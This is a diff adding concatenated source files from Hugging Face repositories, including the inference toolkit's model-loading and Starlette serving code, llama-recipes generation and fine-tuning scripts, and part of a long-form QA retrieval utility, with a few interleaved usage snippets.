+ return ignore_regex_list
346
+ else:
347
+ return []
348
+
349
+ def _is_gpu_available():
350
+ if is_tf_available():
351
+ return True if len(tf.config.list_physical_devices('GPU')) > 0 else False
352
+ elif is_torch_available():
353
+ return torch.cuda.is_available()
354
+ else:
355
+ raise RuntimeError('At least one of TensorFlow 2.0 or PyTorch should be installed. To install TensorFlow 2.0, read the instructions at https://www.tensorflow.org/install/ To install PyTorch, read the instructions at https://pytorch.org/.')
356
+
357
+ def _get_framework():
358
+ if is_torch_available():
359
+ return 'pytorch'
360
+ elif is_tf_available():
361
+ return 'tensorflow'
362
+ else:
363
+ raise RuntimeError('At least one of TensorFlow 2.0 or PyTorch should be installed. To install TensorFlow 2.0, read the instructions at https://www.tensorflow.org/install/ To install PyTorch, read the instructions at https://pytorch.org/.')
364
+
365
+ def _load_repository_from_hf(repository_id: Optional[str]=None, target_dir: Optional[Union[str, Path]]=None, framework: Optional[str]=None, revision: Optional[str]=None, hf_hub_token: Optional[str]=None):
366
+ if hf_hub_token is not None:
367
+ login(token=hf_hub_token)
368
+ if framework is None:
369
+ framework = _get_framework()
370
+ if isinstance(target_dir, str):
371
+ target_dir = Path(target_dir)
372
+ if not target_dir.exists():
373
+ target_dir.mkdir(parents=True)
374
+ if framework == 'pytorch':
375
+ files = HfApi().model_info(repository_id).siblings
376
+ if any((f.rfilename.endswith('safetensors') for f in files)):
377
+ framework = 'safetensors'
378
+ ignore_regex = create_artifact_filter(framework)
379
+ logger.info(f"Ignore regex pattern for files, which are not downloaded: {', '.join(ignore_regex)}")
380
+ snapshot_download(repo_id=repository_id, revision=revision, local_dir=str(target_dir), local_dir_use_symlinks=False, ignore_patterns=ignore_regex)
381
+ return target_dir
382
+
383
+ def check_and_register_custom_pipeline_from_directory(model_dir):
384
+ custom_module = Path(model_dir).joinpath(HF_DEFAULT_PIPELINE_NAME)
385
+ legacy_module = Path(model_dir).joinpath('pipeline.py')
386
+ if custom_module.is_file():
387
+ logger.info(f'Found custom pipeline at {custom_module}')
388
+ spec = importlib.util.spec_from_file_location(HF_MODULE_NAME, custom_module)
389
+ if spec:
390
+ sys.path.insert(0, model_dir)
391
+ handler = importlib.util.module_from_spec(spec)
392
+ sys.modules[HF_MODULE_NAME] = handler
393
+ spec.loader.exec_module(handler)
394
+ custom_pipeline = handler.EndpointHandler(model_dir)
395
+ elif legacy_module.is_file():
396
+ logger.warning('You are using a legacy custom pipeline.\n Please update to the new format.\n See documentation for more information.')
397
+ spec = importlib.util.spec_from_file_location('pipeline.PreTrainedPipeline', legacy_module)
398
+ if spec:
399
+ sys.path.insert(0, model_dir)
400
+ pipeline = importlib.util.module_from_spec(spec)
401
+ sys.modules['pipeline.PreTrainedPipeline'] = pipeline
402
+ spec.loader.exec_module(pipeline)
403
+ custom_pipeline = pipeline.PreTrainedPipeline(model_dir)
404
+ else:
405
+ logger.info(f'No custom pipeline found at {custom_module}')
406
+ custom_pipeline = None
407
+ return custom_pipeline
408
+
409
+ def get_device():
410
+ gpu = _is_gpu_available()
411
+ if gpu:
412
+ return 0
413
+ else:
414
+ return -1
415
+
416
+ def get_pipeline(task: str, model_dir: Path, **kwargs) -> Pipeline:
417
+ device = get_device()
418
+ if is_optimum_neuron_available():
419
+ logger.info('Using device Neuron')
420
+ else:
421
+ logger.info(f"Using device {('GPU' if device == 0 else 'CPU')}")
422
+ if task is None:
423
+ raise EnvironmentError('The task for this model is not set: Please set one: https://huggingface.co/docs#how-is-a-models-type-of-inference-api-and-widget-determined')
424
+ if task in {'automatic-speech-recognition', 'image-segmentation', 'image-classification', 'audio-classification', 'object-detection', 'zero-shot-image-classification'}:
425
+ kwargs['feature_extractor'] = model_dir
426
+ elif task in {'image-to-text', 'text-to-image'}:
427
+ pass
428
+ elif task == 'conversational':
429
+ task = 'text-generation'
430
+ else:
431
+ kwargs['tokenizer'] = model_dir
432
+ if is_optimum_neuron_available():
433
+ hf_pipeline = get_optimum_neuron_pipeline(task=task, model_dir=model_dir)
434
+ elif is_sentence_transformers_available() and task in ['sentence-similarity', 'sentence-embeddings', 'sentence-ranking']:
435
+ hf_pipeline = get_sentence_transformers_pipeline(task=task, model_dir=model_dir, device=device, **kwargs)
436
+ elif is_diffusers_available() and task == 'text-to-image':
437
+ hf_pipeline = get_diffusers_pipeline(task=task, model_dir=model_dir, device=device, **kwargs)
438
+ else:
439
+ hf_pipeline = pipeline(task=task, model=model_dir, device=device, **kwargs)
440
+ if task == 'automatic-speech-recognition' and isinstance(hf_pipeline.model, WhisperForConditionalGeneration):
441
+ hf_pipeline._preprocess_params['chunk_length_s'] = 30
442
+ hf_pipeline.model.config.forced_decoder_ids = hf_pipeline.tokenizer.get_decoder_prompt_ids(language='english', task='transcribe')
443
+ return hf_pipeline
444
+
445
+ def convert_params_to_int_or_bool(params):
446
+ for (k, v) in params.items():
447
+ if v.isnumeric():
448
+ params[k] = int(v)
449
+ if v == 'false':
450
+ params[k] = False
451
+ if v == 'true':
452
+ params[k] = True
453
+ return params
454
+
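Query-string parameters arrive as strings, so they are coerced like this (note that floats are left untouched):

from huggingface_inference_toolkit.utils import convert_params_to_int_or_bool

params = convert_params_to_int_or_bool({'max_new_tokens': '50', 'do_sample': 'true', 'top_p': '0.9'})
print(params)  # {'max_new_tokens': 50, 'do_sample': True, 'top_p': '0.9'}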
455
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/vertex_ai_utils.py
456
+ import re
457
+ from pathlib import Path
458
+ from typing import Union
459
+ from huggingface_inference_toolkit.logging import logger
460
+ GCS_URI_PREFIX = 'gs://'
461
+
462
+ def _load_repository_from_gcs(artifact_uri: str, target_dir: Union[str, Path]='/tmp') -> str:
463
+ from google.cloud import storage
464
+ logger.info(f'Loading model artifacts from {artifact_uri} to {target_dir}')
465
+ if isinstance(target_dir, str):
466
+ target_dir = Path(target_dir)
467
+ if artifact_uri.startswith(GCS_URI_PREFIX):
468
+ matches = re.match(f'{GCS_URI_PREFIX}(.*?)/(.*)', artifact_uri)
469
+ (bucket_name, prefix) = matches.groups()
470
+ gcs_client = storage.Client()
471
+ blobs = gcs_client.list_blobs(bucket_name, prefix=prefix)
472
+ for blob in blobs:
473
+ name_without_prefix = blob.name[len(prefix):]
474
+ name_without_prefix = name_without_prefix[1:] if name_without_prefix.startswith('/') else name_without_prefix
475
+ file_split = name_without_prefix.split('/')
476
+ directory = target_dir / Path(*file_split[0:-1])
477
+ directory.mkdir(parents=True, exist_ok=True)
478
+ if name_without_prefix and (not name_without_prefix.endswith('/')):
479
+ blob.download_to_filename(target_dir / name_without_prefix)
480
+ return str(target_dir.absolute())
481
+
482
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/webservice_starlette.py
483
+ import os
484
+ from pathlib import Path
485
+ from time import perf_counter
486
+ import orjson
487
+ from starlette.applications import Starlette
488
+ from starlette.responses import PlainTextResponse, Response
489
+ from starlette.routing import Route
490
+ from huggingface_inference_toolkit.async_utils import async_handler_call
491
+ from huggingface_inference_toolkit.const import HF_FRAMEWORK, HF_HUB_TOKEN, HF_MODEL_DIR, HF_MODEL_ID, HF_REVISION, HF_TASK
492
+ from huggingface_inference_toolkit.handler import get_inference_handler_either_custom_or_default_handler
493
+ from huggingface_inference_toolkit.logging import logger
494
+ from huggingface_inference_toolkit.serialization.base import ContentType
495
+ from huggingface_inference_toolkit.serialization.json_utils import Jsoner
496
+ from huggingface_inference_toolkit.utils import _load_repository_from_hf, convert_params_to_int_or_bool
497
+ from huggingface_inference_toolkit.vertex_ai_utils import _load_repository_from_gcs
498
+
499
+ async def prepare_model_artifacts():
500
+ global inference_handler
501
+ if len(list(Path(HF_MODEL_DIR).glob('**/*'))) <= 0:
502
+ if HF_MODEL_ID is not None:
503
+ _load_repository_from_hf(repository_id=HF_MODEL_ID, target_dir=HF_MODEL_DIR, framework=HF_FRAMEWORK, revision=HF_REVISION, hf_hub_token=HF_HUB_TOKEN)
504
+ elif len(os.environ.get('AIP_STORAGE_URI', '')) > 0:
505
+ _load_repository_from_gcs(os.environ['AIP_STORAGE_URI'], target_dir=HF_MODEL_DIR)
506
+ else:
507
+ raise ValueError(f"Can't initialize model.\n Please set env HF_MODEL_DIR or provide a HF_MODEL_ID.\n Provided values are:\n HF_MODEL_DIR: {HF_MODEL_DIR} and HF_MODEL_ID:{HF_MODEL_ID}")
508
+ logger.info(f'Initializing model from directory:{HF_MODEL_DIR}')
509
+ inference_handler = get_inference_handler_either_custom_or_default_handler(HF_MODEL_DIR, task=HF_TASK)
510
+ logger.info('Model initialized successfully')
511
+
512
+ async def health(request):
513
+ return PlainTextResponse('Ok')
514
+
515
+ async def predict(request):
516
+ try:
517
+ content_type = request.headers.get('content-Type', None)
518
+ deserialized_body = ContentType.get_deserializer(content_type).deserialize(await request.body())
519
+ if 'inputs' not in deserialized_body and 'instances' not in deserialized_body:
520
+ raise ValueError(f'Body needs to provide a inputs key, received: {orjson.dumps(deserialized_body)}')
521
+ if request.query_params and 'parameters' not in deserialized_body:
522
+ deserialized_body['parameters'] = convert_params_to_int_or_bool(dict(request.query_params))
523
+ start_time = perf_counter()
524
+ pred = await async_handler_call(inference_handler, deserialized_body)
525
+ logger.info(f'POST {request.url.path} | Duration: {(perf_counter() - start_time) * 1000:.2f} ms')
526
+ accept = request.headers.get('accept', None)
527
+ if accept is None or accept == '*/*':
528
+ accept = 'application/json'
529
+ serialized_response_body = ContentType.get_serializer(accept).serialize(pred, accept)
530
+ return Response(serialized_response_body, media_type=accept)
531
+ except Exception as e:
532
+ logger.error(e)
533
+ return Response(Jsoner.serialize({'error': str(e)}), status_code=400, media_type='application/json')
534
+ if os.getenv('AIP_MODE', None) == 'PREDICTION':
535
+ logger.info('Running in Vertex AI environment')
536
+ _predict_route = os.getenv('AIP_PREDICT_ROUTE', None)
537
+ _health_route = os.getenv('AIP_HEALTH_ROUTE', None)
538
+ if _predict_route is None or _health_route is None:
539
+ raise ValueError('AIP_PREDICT_ROUTE and AIP_HEALTH_ROUTE need to be set in Vertex AI environment')
540
+ app = Starlette(debug=False, routes=[Route(_health_route, health, methods=['GET']), Route(_predict_route, predict, methods=['POST'])], on_startup=[prepare_model_artifacts])
541
+ else:
542
+ app = Starlette(debug=False, routes=[Route('/', health, methods=['GET']), Route('/health', health, methods=['GET']), Route('/', predict, methods=['POST']), Route('/predict', predict, methods=['POST'])], on_startup=[prepare_model_artifacts])
543
+
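Once the Starlette app above is served (for example with uvicorn pointing at huggingface_inference_toolkit.webservice_starlette:app and HF_MODEL_ID/HF_TASK set), a client request could look like this sketch; host and port are illustrative:

import requests

resp = requests.post('http://localhost:5000/predict',
                     json={'inputs': 'I love this movie!', 'parameters': {'top_k': 2}},
                     headers={'accept': 'application/json'})
print(resp.status_code, resp.json())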
huggingface_huggingface-llama-recipes.txt ADDED
@@ -0,0 +1,141 @@
1
+ # File: huggingface-llama-recipes-main/assisted_decoding.py
2
+ from transformers import AutoModelForCausalLM, AutoTokenizer
3
+ import time
4
+ import torch
5
+ WARMUP = 2
6
+ MAX_NEW_TOKENS = 10
7
+ DO_SAMPLE = True
8
+ ATOL = 1e-06
9
+ TORCH_DTYPE = torch.float32
10
+ PROMPT = 'Alice and Bob '
11
+ CHECKPOINT = 'meta-llama/Meta-Llama-3-405B'
12
+ ASSISTED_CHECKPOINT = 'meta-llama/Meta-Llama-3.1-8B'
13
+ model = AutoModelForCausalLM.from_pretrained(CHECKPOINT, device_map='auto', torch_dtype=TORCH_DTYPE)
14
+ assistant_model = AutoModelForCausalLM.from_pretrained(ASSISTED_CHECKPOINT, device_map='auto', torch_dtype=TORCH_DTYPE)
15
+ tokenizer = AutoTokenizer.from_pretrained(CHECKPOINT)
16
+ inputs = tokenizer(PROMPT, return_tensors='pt').to(model.device)
17
+ for _ in range(WARMUP):
18
+ model.generate(**inputs, assistant_model=assistant_model)
19
+ start = time.time()
20
+ assisted_outputs = model.generate(**inputs, assistant_model=assistant_model)
21
+ end = time.time()
22
+ assisted_gen_text = tokenizer.batch_decode(assisted_outputs, skip_special_tokens=True)
23
+ print(assisted_gen_text)
24
+ print(f'\nAssisted time taken: {end - start:.2f}s')
25
+
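For comparison, an unassisted baseline timed the same way could be appended to assisted_decoding.py, reusing the objects it already defines:

# Unassisted baseline, run after the assisted generation above.
start = time.time()
baseline_outputs = model.generate(**inputs)
end = time.time()
print(tokenizer.batch_decode(baseline_outputs, skip_special_tokens=True))
print(f'\nBaseline time taken: {end - start:.2f}s')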
26
+ # File: huggingface-llama-recipes-main/awq_generation.py
27
+ import torch
28
+ from transformers import AutoModelForCausalLM, AutoTokenizer, AwqConfig
29
+ model_id = 'hugging-quants/Meta-Llama-3.1-405B-Instruct-AWQ-INT4'
30
+ quantization_config = AwqConfig(bits=4, fuse_max_seq_len=512, do_fuse=True)
31
+ tokenizer = AutoTokenizer.from_pretrained(model_id)
32
+ model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, low_cpu_mem_usage=True, device_map='auto', quantization_config=quantization_config)
33
+ messages = [{'role': 'system', 'content': 'You are a pirate'}, {'role': 'user', 'content': "What's Deep Learning?"}]
34
+ inputs = tokenizer.apply_chat_template(messages, tokenize=True, add_generation_prompt=True, return_tensors='pt', return_dict=True).to('cuda')
35
+ outputs = model.generate(**inputs, do_sample=True, max_new_tokens=256)
36
+ print(tokenizer.batch_decode(outputs, skip_special_tokens=True))
37
+
38
+ # File: huggingface-llama-recipes-main/gptq_generation.py
39
+ import torch
40
+ from transformers import AutoModelForCausalLM, AutoTokenizer
41
+ model_id = 'hugging-quants/Meta-Llama-3.1-405B-Instruct-GPTQ-INT4'
42
+ messages = [{'role': 'system', 'content': 'You are a pirate'}, {'role': 'user', 'content': "What's Deep Learning?"}]
43
+ tokenizer = AutoTokenizer.from_pretrained(model_id)
44
+ model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, low_cpu_mem_usage=True, device_map='auto')
45
+ inputs = tokenizer.apply_chat_template(messages, tokenize=True, add_generation_prompt=True, return_tensors='pt', return_dict=True).to('cuda')
46
+ outputs = model.generate(**inputs, do_sample=True, max_new_tokens=256)
47
+ print(tokenizer.batch_decode(outputs, skip_special_tokens=True))
48
+
49
+ # File: huggingface-llama-recipes-main/peft_finetuning.py
50
+ import torch
51
+ from datasets import load_dataset
52
+ from trl import SFTTrainer
53
+ from peft import LoraConfig
54
+ from transformers import AutoTokenizer, AutoModelForCausalLM, BitsAndBytesConfig, TrainingArguments
55
+ model_id = 'meta-llama/Meta-Llama-3.1-8B'
56
+ tokenizer = AutoTokenizer.from_pretrained(model_id)
57
+ model = AutoModelForCausalLM.from_pretrained(model_id)
58
+ dataset = load_dataset('imdb', split='train')
59
+ training_args = TrainingArguments(output_dir='./results', num_train_epochs=3, per_device_train_batch_size=4, logging_dir='./logs', logging_steps=10)
60
+ QLoRA = True
61
+ if QLoRA:
62
+ quantization_config = BitsAndBytesConfig(load_in_4bit=True, bnb_4bit_compute_dtype=torch.float16, bnb_4bit_quant_type='nf4')
63
+ lora_config = LoraConfig(r=8, target_modules='all-linear', bias='none', task_type='CAUSAL_LM')
64
+ else:
65
+ lora_config = None
66
+ trainer = SFTTrainer(model=model, tokenizer=tokenizer, args=training_args, peft_config=lora_config, train_dataset=dataset, dataset_text_field='text')
67
+ trainer.train()
68
+
69
+ # File: huggingface-llama-recipes-main/prompt_reuse.py
70
+ import os, torch, copy
71
+ from transformers import AutoModelForCausalLM, AutoTokenizer, DynamicCache
72
+ device = 'cuda'
73
+ ckpt = 'meta-llama/Meta-Llama-3.1-8B-Instruct'
74
+ INITIAL_PROMPT = 'From now on, you are going to answer all my questions with historical details. Make sure to always add a bit of french here and there, for style.'
75
+ model = AutoModelForCausalLM.from_pretrained(ckpt, torch_dtype=torch.float16)
76
+ model.to(device)
77
+ tokenizer = AutoTokenizer.from_pretrained(ckpt)
78
+ prompt_cache = DynamicCache()
79
+ inputs = tokenizer(INITIAL_PROMPT, return_tensors='pt').to('cuda')
80
+ prompt_cache = model(**inputs, past_key_values=prompt_cache).past_key_values
81
+ prompt = 'Why are french people obsessed with french?'
82
+ new_inputs = tokenizer(INITIAL_PROMPT + prompt, return_tensors='pt').to('cuda')
83
+ past_key_values = copy.deepcopy(prompt_cache)
84
+ outputs = model.generate(**new_inputs, past_key_values=past_key_values, max_new_tokens=20)
85
+ response = tokenizer.batch_decode(outputs)[0]
86
+ print(response)
87
+ ''
88
+ prompt = 'What is the best city to swim in?'
89
+ new_inputs = tokenizer(INITIAL_PROMPT + prompt, return_tensors='pt').to('cuda')
90
+ outputs = model.generate(**new_inputs, past_key_values=copy.deepcopy(prompt_cache), max_new_tokens=20)
91
+ response = tokenizer.batch_decode(outputs)[0]
92
+ print(response)
93
+ ''
94
+
95
+ # File: huggingface-llama-recipes-main/quantized_cache.py
96
+ import os
97
+ import torch
98
+ from transformers import AutoModelForCausalLM, AutoTokenizer
99
+ device = 'cuda'
100
+ ckpt = 'meta-llama/Meta-Llama-3.1-8B-Instruct'
101
+ model = AutoModelForCausalLM.from_pretrained(ckpt, torch_dtype=torch.float16)
102
+ model.to(device)
103
+ tokenizer = AutoTokenizer.from_pretrained(ckpt)
104
+ prompt = 'Explain the three body problem'
105
+ inputs = tokenizer(prompt, return_tensors='pt').to('cuda')
106
+ outputs = model.generate(**inputs, cache_implementation='quantized', do_sample=True, max_new_tokens=256)
107
+ response = tokenizer.batch_decode(outputs)[0]
108
+ print(response)
109
+ ''
110
+ from transformers import QuantizedCacheConfig
111
+ cache_config = QuantizedCacheConfig(backend='HQQ', nbits=4, axis_key=0, axis_value=1, compute_dtype=torch.float16, device=model.device)
112
+ out = model.generate(**inputs, do_sample=False, max_new_tokens=30, cache_implementation='quantized', cache_config=cache_config)
113
+ print(tokenizer.batch_decode(out, skip_special_tokens=True))
114
+ ''
115
+
116
+ # File: huggingface-llama-recipes-main/torch_compile.py
117
+ import os
118
+ import torch
119
+ from transformers import AutoModelForCausalLM, AutoTokenizer
120
+ os.environ['TOKENIZERS_PARALLELISM'] = 'false'
121
+ device = 'cuda'
122
+ ckpt = 'meta-llama/Meta-Llama-3.1-8B-Instruct'
123
+ model = AutoModelForCausalLM.from_pretrained(ckpt, torch_dtype=torch.float16)
124
+ model.to(device)
125
+ tokenizer = AutoTokenizer.from_pretrained(ckpt)
126
+ prompt = 'Why dogs are so cute?'
127
+ inputs = tokenizer(prompt, return_tensors='pt').to(device)
128
+ model.generation_config.max_length = 128
129
+ outputs = model.generate(**inputs, do_sample=False)
130
+ response = tokenizer.batch_decode(outputs)[0]
131
+ print(response)
132
+ model.forward = torch.compile(model.forward, mode='reduce-overhead', fullgraph=True)
133
+ model.generation_config.cache_implementation = 'static'
134
+ outputs = model.generate(**inputs, do_sample=False)
135
+ response = tokenizer.batch_decode(outputs)[0]
136
+ outputs = model.generate(**inputs, do_sample=False)
137
+ response = tokenizer.batch_decode(outputs)[0]
138
+ outputs = model.generate(**inputs, do_sample=False)
139
+ response = tokenizer.batch_decode(outputs)[0]
140
+ print(response)
141
+
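The three repeated generate calls at the end of torch_compile.py act as warm-up: with mode='reduce-overhead' and a static cache, the first few calls trigger compilation and graph capture. A timing sketch that could follow them, reusing the script's objects:

import time

torch.cuda.synchronize()
start = time.perf_counter()
outputs = model.generate(**inputs, do_sample=False)
torch.cuda.synchronize()
print(f'Compiled, steady-state generate: {time.perf_counter() - start:.2f}s')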
huggingface_huggingface_hub.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_lerobot.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_lm-evaluation-harness.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_notebooks.txt ADDED
@@ -0,0 +1,1057 @@
1
+ # File: notebooks-main/longform-qa/lfqa_utils.py
2
+ import functools
3
+ import math
4
+ import os
5
+ from random import choice, randint
6
+ from time import time
7
+ import numpy as np
8
+ import torch
9
+ import torch.utils.checkpoint as checkpoint
10
+ from torch.utils.data import DataLoader, Dataset, RandomSampler, SequentialSampler
11
+ from tqdm import tqdm
12
+ import faiss
13
+ import nlp
14
+ import pandas as pd
15
+ from elasticsearch import Elasticsearch
16
+ from elasticsearch.helpers import bulk, streaming_bulk
17
+ from transformers import AdamW, AutoModel, AutoModelForSeq2SeqLM, AutoTokenizer, get_linear_schedule_with_warmup
18
+ pd.set_option('display.max_colwidth', None)
19
+
20
+ def make_es_index_snippets(es_client, passages_dset, index_name='english_wiki_kilt_snippets_100w'):
21
+ index_config = {'settings': {'number_of_shards': 1, 'analysis': {'analyzer': {'stop_standard': {'type': 'standard', ' stopwords': '_english_'}}}}, 'mappings': {'properties': {'article_title': {'type': 'text', 'analyzer': 'standard', 'similarity': 'BM25'}, 'section_title': {'type': 'text', 'analyzer': 'standard', 'similarity': 'BM25'}, 'passage_text': {'type': 'text', 'analyzer': 'standard', 'similarity': 'BM25'}}}}
22
+ es_client.indices.create(index=index_name, body=index_config)
23
+ number_of_docs = passages_dset.num_rows
24
+ progress = tqdm(unit='docs', total=number_of_docs)
25
+ successes = 0
26
+
27
+ def passage_generator():
28
+ for passage in passages_dset:
29
+ yield passage
30
+ for (ok, action) in streaming_bulk(client=es_client, index=index_name, actions=passage_generator()):
31
+ progress.update(1)
32
+ successes += ok
33
+ print('Indexed %d documents' % (successes,))
34
+
35
+ def query_es_index(question, es_client, index_name='english_wiki_kilt_snippets_100w', n_results=10, min_length=20):
36
+ q = question.lower()
37
+ banned = ['how', 'why', 'what', 'where', 'which', 'do', 'does', 'is', '?', 'eli5', 'eli5:']
38
+ q = ' '.join([w for w in q.split() if w not in banned])
39
+ response = es_client.search(index=index_name, body={'query': {'multi_match': {'query': q, 'fields': ['article_title', 'section_title', 'passage_text^2'], 'type': 'cross_fields'}}, 'size': 2 * n_results})
40
+ hits = response['hits']['hits']
41
+ support_doc = '<P> ' + ' <P> '.join([hit['_source']['passage_text'] for hit in hits])
42
+ res_list = [dict([(k, hit['_source'][k]) for k in hit['_source'] if k != 'passage_text']) for hit in hits]
43
+ for (r, hit) in zip(res_list, hits):
44
+ r['passage_id'] = hit['_id']
45
+ r['score'] = hit['_score']
46
+ r['passage_text'] = hit['_source']['passage_text']
47
+ res_list = [res for res in res_list if len(res['passage_text'].split()) > min_length][:n_results]
48
+ return (support_doc, res_list)
49
+
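A usage sketch for the sparse retriever, assuming a local Elasticsearch instance already holds the snippet index built by make_es_index_snippets (the lfqa_utils import path is hypothetical and depends on where the file lives):

from elasticsearch import Elasticsearch
from lfqa_utils import query_es_index

es_client = Elasticsearch('http://localhost:9200')
support_doc, hits = query_es_index('why do we yawn when we are tired?', es_client, n_results=5)
print(hits[0]['article_title'], hits[0]['score'])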
50
+ class ELI5DatasetQARetriver(Dataset):
51
+
52
+ def __init__(self, examples_array, extra_answer_threshold=3, min_answer_length=64, training=True, n_samples=None):
53
+ self.data = examples_array
54
+ self.answer_thres = extra_answer_threshold
55
+ self.min_length = min_answer_length
56
+ self.training = training
57
+ self.n_samples = self.data.num_rows if n_samples is None else n_samples
58
+
59
+ def __len__(self):
60
+ return self.n_samples
61
+
62
+ def make_example(self, idx):
63
+ example = self.data[idx]
64
+ question = example['title']
65
+ if self.training:
66
+ answers = [a for (i, (a, sc)) in enumerate(zip(example['answers']['text'], example['answers']['score']))]
67
+ answer_tab = choice(answers).split(' ')
68
+ start_idx = randint(0, max(0, len(answer_tab) - self.min_length))
69
+ answer_span = ' '.join(answer_tab[start_idx:])
70
+ else:
71
+ answer_span = example['answers']['text'][0]
72
+ return (question, answer_span)
73
+
74
+ def __getitem__(self, idx):
75
+ return self.make_example(idx % self.data.num_rows)
76
+
77
+ class RetrievalQAEmbedder(torch.nn.Module):
78
+
79
+ def __init__(self, sent_encoder, dim):
80
+ super(RetrievalQAEmbedder, self).__init__()
81
+ self.sent_encoder = sent_encoder
82
+ self.output_dim = 128
83
+ self.project_q = torch.nn.Linear(dim, self.output_dim, bias=False)
84
+ self.project_a = torch.nn.Linear(dim, self.output_dim, bias=False)
85
+ self.ce_loss = torch.nn.CrossEntropyLoss(reduction='mean')
86
+
87
+ def embed_sentences_checkpointed(self, input_ids, attention_mask, checkpoint_batch_size=-1):
88
+ if checkpoint_batch_size < 0 or input_ids.shape[0] < checkpoint_batch_size:
89
+ return self.sent_encoder(input_ids, attention_mask=attention_mask)[1]
90
+ else:
91
+ device = input_ids.device
92
+ input_shape = input_ids.size()
93
+ token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
94
+ head_mask = [None] * self.sent_encoder.config.num_hidden_layers
95
+ extended_attention_mask: torch.Tensor = self.sent_encoder.get_extended_attention_mask(attention_mask, input_shape, device)
96
+
97
+ def partial_encode(*inputs):
98
+ encoder_outputs = self.sent_encoder.encoder(inputs[0], attention_mask=inputs[1], head_mask=head_mask)
99
+ sequence_output = encoder_outputs[0]
100
+ pooled_output = self.sent_encoder.pooler(sequence_output)
101
+ return pooled_output
102
+ embedding_output = self.sent_encoder.embeddings(input_ids=input_ids, position_ids=None, token_type_ids=token_type_ids, inputs_embeds=None)
103
+ pooled_output_list = []
104
+ for b in range(math.ceil(input_ids.shape[0] / checkpoint_batch_size)):
105
+ b_embedding_output = embedding_output[b * checkpoint_batch_size:(b + 1) * checkpoint_batch_size]
106
+ b_attention_mask = extended_attention_mask[b * checkpoint_batch_size:(b + 1) * checkpoint_batch_size]
107
+ pooled_output = checkpoint.checkpoint(partial_encode, b_embedding_output, b_attention_mask)
108
+ pooled_output_list.append(pooled_output)
109
+ return torch.cat(pooled_output_list, dim=0)
110
+
111
+ def embed_questions(self, q_ids, q_mask, checkpoint_batch_size=-1):
112
+ q_reps = self.embed_sentences_checkpointed(q_ids, q_mask, checkpoint_batch_size)
113
+ return self.project_q(q_reps)
114
+
115
+ def embed_answers(self, a_ids, a_mask, checkpoint_batch_size=-1):
116
+ a_reps = self.embed_sentences_checkpointed(a_ids, a_mask, checkpoint_batch_size)
117
+ return self.project_a(a_reps)
118
+
119
+ def forward(self, q_ids, q_mask, a_ids, a_mask, checkpoint_batch_size=-1):
120
+ device = q_ids.device
121
+ q_reps = self.embed_questions(q_ids, q_mask, checkpoint_batch_size)
122
+ a_reps = self.embed_answers(a_ids, a_mask, checkpoint_batch_size)
123
+ compare_scores = torch.mm(q_reps, a_reps.t())
124
+ loss_qa = self.ce_loss(compare_scores, torch.arange(compare_scores.shape[1]).to(device))
125
+ loss_aq = self.ce_loss(compare_scores.t(), torch.arange(compare_scores.shape[0]).to(device))
126
+ loss = (loss_qa + loss_aq) / 2
127
+ return loss
128
+
129
+ def make_qa_retriever_model(model_name='google/bert_uncased_L-8_H-512_A-8', from_file=None, device='cuda:0'):
130
+ tokenizer = AutoTokenizer.from_pretrained(model_name)
131
+ bert_model = AutoModel.from_pretrained(model_name).to(device)
132
+ d_ids = torch.LongTensor([[bert_model.config.bos_token_id if bert_model.config.bos_token_id is not None else 1]]).to(device)
133
+ d_mask = torch.LongTensor([[1]]).to(device)
134
+ sent_dim = bert_model(d_ids, attention_mask=d_mask)[1].shape[-1]
135
+ qa_embedder = RetrievalQAEmbedder(bert_model, sent_dim).to(device)
136
+ if from_file is not None:
137
+ param_dict = torch.load(from_file)
138
+ qa_embedder.load_state_dict(param_dict['model'])
139
+ return (tokenizer, qa_embedder)
140
+
141
+ def make_qa_retriever_batch(qa_list, tokenizer, max_len=64, device='cuda:0'):
142
+ q_ls = [q for (q, a) in qa_list]
143
+ a_ls = [a for (q, a) in qa_list]
144
+ q_toks = tokenizer.batch_encode_plus(q_ls, max_length=max_len, pad_to_max_length=True)
145
+ (q_ids, q_mask) = (torch.LongTensor(q_toks['input_ids']).to(device), torch.LongTensor(q_toks['attention_mask']).to(device))
146
+ a_toks = tokenizer.batch_encode_plus(a_ls, max_length=max_len, pad_to_max_length=True)
147
+ (a_ids, a_mask) = (torch.LongTensor(a_toks['input_ids']).to(device), torch.LongTensor(a_toks['attention_mask']).to(device))
148
+ return (q_ids, q_mask, a_ids, a_mask)
149
+
150
+ def train_qa_retriever_epoch(model, dataset, tokenizer, optimizer, scheduler, args, e=0):
151
+ model.train()
152
+ train_sampler = RandomSampler(dataset)
153
+ model_collate_fn = functools.partial(make_qa_retriever_batch, tokenizer=tokenizer, max_len=args.max_length, device='cuda:0')
154
+ data_loader = DataLoader(dataset, batch_size=args.batch_size, sampler=train_sampler, collate_fn=model_collate_fn)
155
+ epoch_iterator = tqdm(data_loader, desc='Iteration', disable=True)
156
+ loc_steps = 0
157
+ loc_loss = 0.0
158
+ st_time = time()
159
+ for (step, batch) in enumerate(epoch_iterator):
160
+ (q_ids, q_mask, a_ids, a_mask) = batch
161
+ pre_loss = model(q_ids, q_mask, a_ids, a_mask, checkpoint_batch_size=args.checkpoint_batch_size)
162
+ loss = pre_loss.sum()
163
+ loss.backward()
164
+ optimizer.step()
165
+ scheduler.step()
166
+ model.zero_grad()
167
+ loc_loss += loss.item()
168
+ loc_steps += 1
169
+ if step % args.print_freq == 0 or step == 1:
170
+ print('{:2d} {:5d} of {:5d} \t L: {:.3f} \t -- {:.3f}'.format(e, step, len(dataset) // args.batch_size, loc_loss / loc_steps, time() - st_time))
171
+ loc_loss = 0
172
+ loc_steps = 0
173
+
174
+ def train_qa_retriever_joint_epoch(model, dataset_list, tokenizer, optimizer, scheduler, args, e=0):
175
+ model.train()
176
+ model_collate_fn = functools.partial(make_qa_retriever_batch, tokenizer=tokenizer, max_len=args.max_length, device='cuda:0')
177
+ train_samplers = [RandomSampler(dataset) for dataset in dataset_list]
178
+ data_loaders = [DataLoader(dataset, batch_size=args.batch_size, sampler=train_sampler, collate_fn=model_collate_fn) for (dataset, train_sampler) in zip(dataset_list, train_samplers)]
179
